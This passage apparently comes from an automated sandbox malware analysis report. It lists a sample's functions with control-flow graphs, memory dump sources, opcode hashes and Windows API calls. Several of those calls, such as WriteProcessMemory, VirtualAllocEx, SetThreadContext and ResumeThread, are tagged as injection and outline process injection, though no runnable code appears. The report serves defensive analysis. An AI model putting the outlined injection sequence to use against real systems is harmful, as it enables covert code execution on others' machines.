                                                              control_flow_graph 764 23244c4-23259b9 CreateActCtxA 767 23259c2-2325a1c 764->767 768 23259bb-23259c1 764->768 775 2325a2b-2325a2f 767->775 776 2325a1e-2325a21 767->776 768->767 777 2325a40 775->777 778 2325a31-2325a3d 775->778 776->775 780 2325a41 777->780 778->777 780->780
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 023259A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 963c9570b1d80e21f9a07fe07062f4d67417d3acbdc1d84da351d0726405c914
                                                              • Instruction ID: 2009b2fae478bdecdbbfe6ab7ad214ee91eedbd07fd80da4f04847071550c620
                                                              • Opcode Fuzzy Hash: 963c9570b1d80e21f9a07fe07062f4d67417d3acbdc1d84da351d0726405c914
                                                              • Instruction Fuzzy Hash: 6741DFB0D00719CBDB24CFA9C884B9EBBF5BF48304F60816AD408AB251DB756949CF90
                                                              Function 023258ED Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 781 23258ed-23259b9 CreateActCtxA 783 23259c2-2325a1c 781->783 784 23259bb-23259c1 781->784 791 2325a2b-2325a2f 783->791 792 2325a1e-2325a21 783->792 784->783 793 2325a40 791->793 794 2325a31-2325a3d 791->794 792->791 796 2325a41 793->796 794->793 796->796
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 023259A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: d32eeb52b48940cd20d61b328d29e0ecd05180b7a905acf3884fd23cd08189cf
                                                              • Instruction ID: 6b3e7a9492e602c989f75fafd0a65cffa584e5db6c4b1bf1325b015d9c16b76e
                                                              • Opcode Fuzzy Hash: d32eeb52b48940cd20d61b328d29e0ecd05180b7a905acf3884fd23cd08189cf
                                                              • Instruction Fuzzy Hash: FD41CFB1C00719CFDB24CFA9C984B9EBBF5BF49304F60816AD409AB251DB75694ACF50
                                                              Function 044F4011 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 797 44f4011-44f4066 799 44f4068-44f4074 797->799 800 44f4076-44f40b5 WriteProcessMemory 797->800 799->800 802 44f40be-44f40ee 800->802 803 44f40b7-44f40bd 800->803 803->802
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 044F40A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 658cd393d6a7fd154d6851022816b4fb09c0df23adbc4616083cff56413d26c8
                                                              • Instruction ID: 1c5ea6773428fa3eadd9b926dd0e65b927beda4be4e7d5fe5bd7863dba4ad84f
                                                              • Opcode Fuzzy Hash: 658cd393d6a7fd154d6851022816b4fb09c0df23adbc4616083cff56413d26c8
                                                              • Instruction Fuzzy Hash: 142146769002499FCF10CFA9C884BEEBFF5FF48310F14842AE959A7241C7799945DBA1
                                                              Function 044F4018 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 807 44f4018-44f4066 809 44f4068-44f4074 807->809 810 44f4076-44f40b5 WriteProcessMemory 807->810 809->810 812 44f40be-44f40ee 810->812 813 44f40b7-44f40bd 810->813 813->812
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 044F40A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 874cf79f4993ceacd618f919d5ab9a734f78d1f51f6443b25cc4336edfc36d5e
                                                              • Instruction ID: 0f7b1a0e6e1e3939b932aeb6d13f0a6c723a5d1b4557b1a39c487ebfb4c901a9
                                                              • Opcode Fuzzy Hash: 874cf79f4993ceacd618f919d5ab9a734f78d1f51f6443b25cc4336edfc36d5e
                                                              • Instruction Fuzzy Hash: F12157729003099FCF10CFA9C884BDEBBF5FF48310F10842AE919A7241CB79A944CBA1
                                                              Function 044F4100 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 044F4188
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 880ca7f0135c8e4417df6d2f896b9610538a40b39dd7d686d7988b8cc774c4dc
                                                              • Instruction ID: 4fc552d3d23df928c388f5c3b194a4e48e46707a51600045918fba951ef61044
                                                              • Opcode Fuzzy Hash: 880ca7f0135c8e4417df6d2f896b9610538a40b39dd7d686d7988b8cc774c4dc
                                                              • Instruction Fuzzy Hash: A5214AB2D003599FDB10CF99C885ADEFBF5FF58320F10842AE518A7241C7399505DBA0
                                                              Function 044F3E78 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 044F3EFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: e256413f9c8f384dd23d649c748d857f11c5df0c9fb642c8949d1421358b93f9
                                                              • Instruction ID: 128aa384cb78888c8a070999d62598e7c4717a234a2ad86a7c533da3b2cafd39
                                                              • Opcode Fuzzy Hash: e256413f9c8f384dd23d649c748d857f11c5df0c9fb642c8949d1421358b93f9
                                                              • Instruction Fuzzy Hash: 9A2159759002098FDB10CFAAC8847EEBFF4EF48324F14842AD959A7241CB78A945CFA0
                                                              Function 0232D4E1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0232D56F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 01a8e908a7f79bb925729f1d39124d1768810d0f21c38ffbf96a3cf0436a8f84
                                                              • Instruction ID: 96f6d8e917ff946254c59285c7cc9cabd0c29e7cb9f9d52aebf118e341f9cca5
                                                              • Opcode Fuzzy Hash: 01a8e908a7f79bb925729f1d39124d1768810d0f21c38ffbf96a3cf0436a8f84
                                                              • Instruction Fuzzy Hash: 2C2116B59002089FDB10CF9AD584ADEBFF8FB48310F14801AE918A7310C375A944DFA0
                                                              Function 044F3E80 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 044F3EFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 036838bae6972ba09c058577dbafdf8a61f4daddb2d375fd21d5a9c2bc56e130
                                                              • Instruction ID: b269dd8894925e759ce2ffba6db62d95d88138d30d5794e97a4389c058f00d32
                                                              • Opcode Fuzzy Hash: 036838bae6972ba09c058577dbafdf8a61f4daddb2d375fd21d5a9c2bc56e130
                                                              • Instruction Fuzzy Hash: 5A211A719002098FDB10DFAAC8857EEBBF4EF48314F14842AD959A7241DB78A945CFA5
                                                              Function 044F4108 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 044F4188
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: b878deb0e4258e2e228955cc59fae97fed0170c7af7070b06a341eb1216d83dd
                                                              • Instruction ID: ed2d6529615fa10707fa301713dd9b24d9460cce3851a7331b2a180f144b0818
                                                              • Opcode Fuzzy Hash: b878deb0e4258e2e228955cc59fae97fed0170c7af7070b06a341eb1216d83dd
                                                              • Instruction Fuzzy Hash: 872128719003599FDB10CFAAC984AEEFBF5FF48320F50842AE519A7241CB399945DBA1
                                                              Function 0232D4E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0232D56F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 278d9eb46cbac9487c71cf046bcc25bb7924a3bafae9a60ea39225d9a3aed84c
                                                              • Instruction ID: 277a35d9c815c5a5eed587e686afe47e4f3ed6158659037c9a79e6ca33d1c776
                                                              • Opcode Fuzzy Hash: 278d9eb46cbac9487c71cf046bcc25bb7924a3bafae9a60ea39225d9a3aed84c
                                                              • Instruction Fuzzy Hash: 2821E4B59002089FDB10CF9AD984ADEBFF8EB48310F14801AE918A3310D375A944CFA4
                                                              Function 044F3F50 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 044F3FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 9cb0ff2e55fdecce8fb0d93768d8fb48b47323b177d1eb4c47bbf424e034312b
                                                              • Instruction ID: f0138f197c4f861bde6690237f1a5395ebbd5dbfe3ea30f6c955b09a6cdb689f
                                                              • Opcode Fuzzy Hash: 9cb0ff2e55fdecce8fb0d93768d8fb48b47323b177d1eb4c47bbf424e034312b
                                                              • Instruction Fuzzy Hash: AA1159769002499FDB10DFA9C844ADFBFF5EF48320F14841AE519A7251C739A945DFA0
                                                              Function 05069C01 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 05069C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              • Opcode ID: 3b8096442577bad246760c2ef876692920612040527cfb6b93468a14b5074521
                                                              • Instruction ID: 3ec377bccc7ec0894b194319f7e18ba5fbc707b423151c6a01cae79d2ec4f1c4
                                                              • Opcode Fuzzy Hash: 3b8096442577bad246760c2ef876692920612040527cfb6b93468a14b5074521
                                                              • Instruction Fuzzy Hash: 8E1123B5C046199FCB10CF9AD984BDEFBF4FB88320F10811AE819A3640D774A945CFA5
                                                              Function 044F3F58 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 044F3FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 05260aa22bc287fed505cd09f1685e35ebf963b1d438966f98883852900226e3
                                                              • Instruction ID: a0f0f92e77526771d9b4d9595f5521d3a792cec51d0ff74fd16d2ab7ce2a1517
                                                              • Opcode Fuzzy Hash: 05260aa22bc287fed505cd09f1685e35ebf963b1d438966f98883852900226e3
                                                              • Instruction Fuzzy Hash: AC1137769002499FDB10DFAAC844ADFBFF5EF88320F14841AE919A7250CB75A944DFA1
                                                              Function 05068A68 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 05069C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              • Opcode ID: 739c8f83c74abbcae573fa8f0fb4cdf3f7c1644ccfebb8eb761a03e6d4a87102
                                                              • Instruction ID: f032997de95b0a9824536e9f6d40efe6c94d5790681a8001ab55d67a027e7128
                                                              • Opcode Fuzzy Hash: 739c8f83c74abbcae573fa8f0fb4cdf3f7c1644ccfebb8eb761a03e6d4a87102
                                                              • Instruction Fuzzy Hash: 381134B5C04619DBCB10CF9AD954BAEFBF4FB88320F10851AE829B7640C775A944CFA5
                                                              Function 044F3992 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 7b081155ffa8052348814c4a8fb1f5f72135b834e28a8bafc457a2ae4b9a80b6
                                                              • Instruction ID: ae5621c1d9a37e3bbe23fa9abcd13b44366e2b1f393b0495c9901448ae5926c2
                                                              • Opcode Fuzzy Hash: 7b081155ffa8052348814c4a8fb1f5f72135b834e28a8bafc457a2ae4b9a80b6
                                                              • Instruction Fuzzy Hash: CC114971D002488FDB10DFAAC8457EFFBF4EB88320F14841AD519A7241CB39A945CFA4
                                                              Function 044F3998 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 73ea3163eb38cb381b8f1bcb34a91bfacb59fd342a8506b266289809f4e5aeff
                                                              • Instruction ID: 0d4d5d535266e6ce0935e8a970b169b1e58aee209bbf451a457165aa78cc2c0b
                                                              • Opcode Fuzzy Hash: 73ea3163eb38cb381b8f1bcb34a91bfacb59fd342a8506b266289809f4e5aeff
                                                              • Instruction Fuzzy Hash: 101128719002498BDB20DFAAC8457AFFBF4EB88324F14841AD519A7240CB75A944CFA5
                                                              Function 0232B1F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0232B25E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 6ae75eeaaa4b2bed6312adb07aa5fbd1d14213873962881ec6b8169e9b57eda3
                                                              • Instruction ID: 5bbead866bf036d93b1fe3912bf3a36ac0fc7de2bc394da47667c025d152989b
                                                              • Opcode Fuzzy Hash: 6ae75eeaaa4b2bed6312adb07aa5fbd1d14213873962881ec6b8169e9b57eda3
                                                              • Instruction Fuzzy Hash: 55110FB6C003498FCB10CF9AC844B9EFBF5EB88324F14841AD429A7210C375A545CFA5
                                                              Function 044F50C0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 044F89D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: c1823395918648d6ec17890215e3d6bc2cca03e7ef9814b32efddae6f5ed2f69
                                                              • Instruction ID: 7f48b019ca99ad771864b1ad84026922e4ad05815fcf4eb1a8697832c30c074c
                                                              • Opcode Fuzzy Hash: c1823395918648d6ec17890215e3d6bc2cca03e7ef9814b32efddae6f5ed2f69
                                                              • Instruction Fuzzy Hash: C411E0B69002499FDB20DF9AC945BDFBBF8EB48320F10841AE658A7601D375A944CFA5
                                                              Function 044F8971 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 044F89D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 3f9d7891e18b8187bf03357dce51e55b1c30aab8ab582ca72c505ff646edf508
                                                              • Instruction ID: e88347e1bd4dbaa3dee2e6812a7afb6e15e82710b00761f307a4f745588e15be
                                                              • Opcode Fuzzy Hash: 3f9d7891e18b8187bf03357dce51e55b1c30aab8ab582ca72c505ff646edf508
                                                              • Instruction Fuzzy Hash: 121103B6800249DFDB10DF9AC885BDFBFF8EB48320F10841AE558A7600C379A944CFA1
                                                              Function 05069CB0 Relevance: 1.3, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000), ref: 05069D17
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 5ea271154c7ffcdd2d0e036a35fb3305c857d365498c906a4c40c6ed0766bdc4
                                                              • Instruction ID: 5b64ceef816c5c56a439ec71bb495b673c08eaa6f7ae265dc6f723faf2a3d7f9
                                                              • Opcode Fuzzy Hash: 5ea271154c7ffcdd2d0e036a35fb3305c857d365498c906a4c40c6ed0766bdc4
                                                              • Instruction Fuzzy Hash: 4A116AB1800249CFCB10CF9AD844BDEFBF8EF48324F10842AD518A3241D335A945CFA5
                                                              Function 05068A74 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000), ref: 05069D17
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: b22188b11b05fd1c6e80bebe84b66d91e75c6a9ad3248c4e26ba8c2a44d4eab3
                                                              • Instruction ID: 0fc364a4a05fa474e716b384145fdd393814890997125e1376d3cac494103fd7
                                                              • Opcode Fuzzy Hash: b22188b11b05fd1c6e80bebe84b66d91e75c6a9ad3248c4e26ba8c2a44d4eab3
                                                              • Instruction Fuzzy Hash: 94116AB1800249CFDB10CF9AD844BEEFBF8EF48320F10846AD518A3241C374A944CFA4
                                                              Function 00B1D3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc810226de042f145aeab72eca357e8ff0c39d1d22bc1c3e235713f24d66e1ca
                                                              • Instruction ID: 4797939a93ca236fffb5f47fa188714183892264989301e145a7d2c8f17a1217
                                                              • Opcode Fuzzy Hash: dc810226de042f145aeab72eca357e8ff0c39d1d22bc1c3e235713f24d66e1ca
                                                              • Instruction Fuzzy Hash: 2F213A71504204DFDB05DF14D9C0B56BFA5FB98324F64C5ADE9090B35AC33AE896C7A2
                                                              Function 00B1D4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84603bf597cfc16ed0676b1f82d464d73dbbf5941ec6f75ba446f73f3f5e0758
                                                              • Instruction ID: 69de394cc793a6b3f2bc3fa790d7be3ada48655b6a05eb57cc662bbcedc4722e
                                                              • Opcode Fuzzy Hash: 84603bf597cfc16ed0676b1f82d464d73dbbf5941ec6f75ba446f73f3f5e0758
                                                              • Instruction Fuzzy Hash: 78213771504240DFDB15DF14D9C0B66BFA6FBA8328F64C5A9E8090B256C336D896CBB1
                                                              Function 00B2D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080622726.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b2d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bc8275131f53245cedcbbbc72662c45791910f708ac6061c8b776704be2414f
                                                              • Instruction ID: bd54d5fc9af92e113b1fdf39291741e8e2a9970ede80d5610eee0e9907947cd3
                                                              • Opcode Fuzzy Hash: 6bc8275131f53245cedcbbbc72662c45791910f708ac6061c8b776704be2414f
                                                              • Instruction Fuzzy Hash: 25212671604200EFDB05DF14E9C0B26BBE5FB88314F34C9ADE80D4B296C33AD806CA61
                                                              Function 00B2D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080622726.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b2d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd509161534240404ac405a8bcd0ae54306baf5c06c68098d1f9da107b6d1955
                                                              • Instruction ID: 7c5220efe72d21966f04e080bf00b9c8515ab62061e24422668f52fa0b4cf6ba
                                                              • Opcode Fuzzy Hash: cd509161534240404ac405a8bcd0ae54306baf5c06c68098d1f9da107b6d1955
                                                              • Instruction Fuzzy Hash: 1F21F275604240DFCB15DF14E9D4B27BBA5EB88324F24C9ADD90E4B2A6C33AD807CA61
                                                              Function 00B2D006 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080622726.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b2d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e2986363dba18590a226644d25b535da19d0cbc899c6dfcbfd1a3fb869e2a7c
                                                              • Instruction ID: 0f0daea6e90e9d57af356172267658a4c3b10a3f1512d72160ec268182cba5ad
                                                              • Opcode Fuzzy Hash: 3e2986363dba18590a226644d25b535da19d0cbc899c6dfcbfd1a3fb869e2a7c
                                                              • Instruction Fuzzy Hash: AE2192755083809FCB02CF14D994B12BFB1EB46314F28C5DAD8498F2A7C33A980ACB62
                                                              Function 00B1D4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction ID: 79e79aa6f72abc390db92df3ffbaae88a8a97f039d3687cf9e5b92e2b67324b4
                                                              • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction Fuzzy Hash: CE11D376504280CFCB16CF14D5C4B56BFB2FBA4324F24C6A9D8490B656C33AD85ACBA1
                                                              Function 00B1D3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
